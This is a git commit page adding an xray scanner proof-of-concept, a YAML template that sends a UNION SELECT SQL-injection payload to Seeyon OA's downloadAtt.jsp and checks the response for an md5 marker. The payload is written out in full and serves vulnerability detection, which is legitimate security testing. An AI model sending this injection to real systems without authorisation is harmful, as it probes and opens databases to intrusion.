优化xray解析模块,支持groups、新增poc

This commit is contained in:
影舞者
2021-11-16 14:42:35 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions
@@ -0,0 +1,12 @@
name: poc-yaml-seeyon-wooyun-2015-0108235-sqli
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1)%20and%201=2%20union%20select%201,2,3,4,5,md5({{rand}}),7--
expression: |
response.body.bcontains(bytes(md5(string(rand))))
detail:
author: Rexus
links:
- https://bugs.shuimugan.com/bug/view?bug_no=0108235